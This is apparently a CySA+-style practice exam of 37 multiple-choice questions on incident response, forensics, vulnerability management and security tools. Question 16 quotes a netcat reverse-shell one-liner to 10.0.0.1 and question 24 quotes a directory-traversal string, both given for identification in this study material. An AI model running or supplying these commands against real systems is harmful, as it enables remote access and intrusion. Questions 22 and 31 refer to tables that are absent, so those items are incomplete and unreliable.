CYSA 6
Title of test: CYSA 6
Description: CYSA Test 6
1. When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgrounds containing host details, has been running for over two days. Which of the following activities will provide the best insight into this potentially malicious process, based on the anomalous behavior?
   A. Changes to system environment variables
   B. SMB network traffic related to the system process
   C. Recent browser history of the primary user
   D. Activities taken by PID 1024

2. Which of the following evidence collection methods is most likely to be acceptable in court cases?
   A. Copying all access files at the time of the incident
   B. Creating a file-level archive of all files
   C. Providing a full system backup inventory
   D. Providing a bit-level image of the hard drive

3. A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?
   A. Eradication
   B. Isolation
   C. Reporting
   D. Forensic analysis

4. A cybersecurity analyst has been assigned to the threat-hunting team to create a dynamic detection strategy based on behavioral analysis and attack patterns. Which of the following best describes what the analyst will be creating?
   A. Bots
   B. IoCs
   C. TTPs
   D. Signatures

5. Which of the following would eliminate the need for different passwords for a variety of internal applications?
   A. CASB
   B. SSO
   C. PAM
   D. MFA

6. Which of the following best explains the importance of communicating with staff regarding the official public communication plan related to incidents impacting the organization?
   A. To establish what information is allowed to be released by designated employees
   B. To designate an external public relations firm to represent the organization
   C. To ensure that all news media outlets are informed at the same time
   D. To define how each employee will be contacted after an event occurs

7. Which of the following would most likely be used to update a dashboard that integrates with multiple vendor tools?
   A. Webhooks
   B. Extensible Markup Language
   C. Threat feed combination
   D. JavaScript Object Notation

8. An organization has a critical financial application hosted online that does not allow event logging to be sent to the corporate SIEM. Which of the following is the best option for the security analyst to configure to improve the efficiency of security operations?
   A. Configure a new SIEM specific to the management of the hosted environment
   B. Subscribe to a threat feed related to the vendor's application
   C. Use a vendor-provided API to automate pulling the logs in real time
   D. Download and manually import the logs outside of business hours

9. After an incident, a security analyst needs to perform a forensic analysis to report complete information to a company stakeholder. Which of the following is most likely the goal of the forensic analysis in this case?
   A. Provide a full picture of the existing risks
   B. Notify law enforcement of the incident
   C. Further contain the incident
   D. Determine root cause information

10. Which of the following is the most important reason for an incident response team to develop a formal incident declaration?
   A. To require that an incident be reported through the proper channels
   B. To identify and document staff who have the authority to declare an incident
   C. To allow for public disclosure of a security event impacting the organization
   D. To establish the department that is responsible for responding to an incident

11. An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (Choose two.)
   A. Ensure users document the system recovery plan prior to deployment
   B. Perform a full system-level backup following the change
   C. Leverage an audit tool to identify changes that are being made
   D. Identify assets with dependencies that could be impacted by the change
   E. Require diagrams to be completed for all critical systems
   F. Ensure that all assets are properly listed in the inventory management system

12. An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most likely reason the firewall feed stopped working?
   A. The firewall service account was locked out
   B. The firewall was using a paid feed
   C. The firewall certificate expired
   D. The firewall failed open

13. A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Which of the following should the analyst utilize to best accomplish this goal?
   A. SMB share
   B. API endpoint
   C. SMTP notification
   D. SNMP trap

14. An analyst is imaging a hard drive that was obtained from the system of an employee who is suspected of going rogue. The analyst notes that the initial hash of the evidence drive does not match the resultant hash of the imaged copy. Which of the following best describes the reason for the conflicting investigative findings?
   A. Chain of custody was not maintained for the evidence drive
   B. Legal authorization was not obtained prior to seizing the evidence drive
   C. Data integrity of the imaged drive could not be verified
   D. Evidence drive imaging was performed without a write blocker

15. A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. Which of the following tools would the security team most likely recommend to perform this test?
   A. Hashcat
   B. OpenVAS
   C. OWASP ZAP
   D. Nmap

16. A security analyst detected the following suspicious activity:
   rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f
   Which of the following most likely describes the activity?
   A. Network pivoting
   B. Host scanning
   C. Privilege escalation
   D. Reverse shell

17. An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender. Which of the following information security goals is the analyst most likely trying to achieve?
   A. Non-repudiation
   B. Authentication
   C. Authorization
   D. Integrity

18. Before adopting a disaster recovery plan, some team members need to gather in a room to review the written scenarios. Which of the following best describes what the team is doing?
   A. Simulation
   B. Tabletop exercise
   C. Full test
   D. Parallel test

19. Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the general public, as a best practice? (Choose two.)
   A. Law enforcement
   B. Governance
   C. Legal
   D. Manager
   E. Public relations
   F. Human resources

20. Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported? (Choose two.)
   A. Signal-shielded bag
   B. Tamper-evident seal
   C. Thumb drive
   D. Crime scene tape
   E. Write blocker
   F. Drive duplicator

21. During the rollout of a patch to the production environment, it was discovered that required connections to remote systems are no longer possible. Which of the following steps would have most likely revealed this gap?
   A. Implementation
   B. User acceptance testing
   C. Validation
   D. Rollback

22. An organization has tracked several incidents that are listed in the following table: Which of the following is the organization's MTTD?
   A. 140
   B. 150
   C. 160
   D. 180

23. A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and has decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does this scenario illustrate?
   A. Service-level agreement
   B. Business process interruption
   C. Degrading functionality
   D. Proprietary system

24. While reviewing the web server logs, a security analyst notices the following snippet:
   ..\../..\../boot.ini
   Which of the following is being attempted?
   A. Directory traversal
   B. Remote file inclusion
   C. Cross-site scripting
   D. Remote code execution
   E. Enumeration of /etc/passwd

25. Exploit code for a recently disclosed critical software vulnerability was publicly available for download for several days before being removed. Which of the following CVSS v3.1 temporal metrics was most impacted by this exposure?
   A. Remediation level
   B. Exploit code maturity
   C. Report confidence
   D. Availability

26. Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operating system events?
   A. Registry editing
   B. Network mapping
   C. Timeline analysis
   D. Write blocking

27. Which of the following best describes the importance of KPIs in an incident response exercise?
   A. To identify the personal performance of each analyst
   B. To describe how incidents were resolved
   C. To reveal what the team needs to prioritize
   D. To expose which tools should be used

28. An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategies should an analyst recommend to evaluate the security of the software?
   A. Static testing
   B. Vulnerability testing
   C. Dynamic testing
   D. Penetration testing

29. A security team needs to demonstrate how prepared the team is in the event of a cyberattack. Which of the following would best demonstrate a real-world incident without impacting operations?
   A. Review lessons-learned documentation and create a playbook
   B. Gather all internal incident response party members and perform a simulation
   C. Deploy known malware and document the remediation process
   D. Schedule a system recovery to the DR site for a few applications

30. A SOC receives several alerts indicating user accounts are connecting to the company's identity provider through non-secure communications. User credentials for accessing sensitive, business-critical systems could be exposed. Which of the following logs should the SOC use when determining malicious intent?
   A. DNS
   B. tcpdump
   C. Directory
   D. IDS

31. A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings: Which of the following vulnerabilities should be patched first?
   A. Vulnerability 1
   B. Vulnerability 2
   C. Vulnerability 3
   D. Vulnerability 4

32. Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies?
   A. Implementing credentialed scanning
   B. Changing from a passive to an active scanning approach
   C. Implementing a central place to manage IT assets
   D. Performing agentless scanning

33. An organization plans to use an advanced machine-learning tool as a central collection server. The tool will perform data aggregation and analysis. Which of the following should the organization implement?
   A. SIEM
   B. Firewalls
   C. Syslog server
   D. Flow analysis

34. A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MITRE repositories would be best to review?
   A. Cyber Threat Intelligence
   B. Common Vulnerabilities and Exposures
   C. Cyber Analytics Repository
   D. ATT&CK

35. A corporation wants to implement an agent-based endpoint solution to help:
   • Flag various threats
   • Review vulnerability feeds
   • Aggregate data
   • Provide real-time metrics by using scripting languages
   Which of the following tools should the corporation implement to reach this goal?
   A. DLP
   B. Heuristics
   C. SOAR
   D. NAC

36. A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following should the SOC manager utilize to improve the process?
   A. The most recent audit report
   B. The incident response playbook
   C. The incident response plan
   D. The lessons-learned register

37. Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-when information and evaluate the effectiveness of the plans in place. Which of the following incident management life cycle processes does this describe?
   A. Business continuity plan
   B. Lessons learned
   C. Forensic analysis
   D. Incident response plan